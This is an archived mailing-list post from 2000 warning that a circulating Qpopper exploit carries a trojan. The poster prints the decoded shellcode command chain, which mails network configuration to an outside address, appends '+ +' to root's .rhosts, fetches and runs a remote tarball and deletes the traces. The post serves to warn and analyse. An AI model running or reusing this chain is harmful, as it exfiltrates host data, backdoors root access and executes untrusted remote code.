Vulnerability Development mailing list archives
Re: QPOP2.5* exploit ??
From: phi-vulndev () EXORSUS NET (phi-vulndev () EXORSUS NET)
Date: Mon, 15 May 2000 10:36:03 +1000
this has been found in the wild, however there seems to be a trojan in the shellcode. Popper 2.5* has been thought to be safe. I would not reccomend running this on your own machine unless you crack the shellcode and see what it does.
Trivial xor of 2 encoding of part of the shellcode reveals: /bin/sh -c /sbin/ifconfig -a | mail -s solwar etcownz () hotmail com >> /dev/null; echo '+ +' >> ~root/.rhosts; rcp lp () skinner trdlnk com:/usr/spool/lp/model/solwar.tar solwar.tar; tar -xvf solwar* >> /dev/null; cd solwar; chmod +x solwar.sh; ./solwar.sh >> /dev/null; cd ..; rm -rf solwar*; I have yet to totally decode the asm, and don't think I will bother to go any further, so it is possible it does more than just this, however it quite obviously isn't a straight qpopper exploit. Anyone tried against a qpopper install to see if it executes? Phi.
Current thread:
- Napster Fix, (continued)
- Napster Fix optik (May 14)
- Re: QPOP2.5* exploit ?? Maurycy Prodeus (May 15)
- Re: QPOP2.5* exploit ?? jms (May 14)
- Re: QPOP2.5* exploit ?? Eric LeBlanc (May 15)
- hi sparc qpop info sp00n () GMX DE (May 14)
- Re: QPOP2.5* exploit ?? typo () INFERNO TUSCULUM EDU (May 14)
- Re: QPOP2.5* exploit ?? typo () INFERNO TUSCULUM EDU (May 14)
- Re: QPOP2.5* exploit ?? Dimitry Andric (May 14)
- Re: QPOP2.5* exploit ?? Martin Ixter (May 14)
- TROJAN WARNING: Re: QPOP2.5* exploit ?? Nic Bellamy (May 14)
- Re: QPOP2.5* exploit ?? phi-vulndev () EXORSUS NET (May 14)
- Bubble Boy Virus Spreading Mechanism Andrew Leong (May 15)
- Re: QPOP2.5* exploit ?? Lluis Mora (May 15)
- Bugtraq Stats for the last 3 years available now. Alfred Huger (May 15)
- xsoldier mandrake exploit. egid=games with the right shellcode Larry C$ (May 15)
- Re: QPOP2.5* exploit ?? rpc (May 14)
- Fwd: [Newssubmission: Security vulnerability in the ICS HTTPServer component] TLsecurity.net (May 14)
- Re: regarding phrack49's stack smashing tutorial Pavel Kankovsky (May 14)
- Re: regarding phrack49's stack smashing tutorial Darshan Patil (May 14)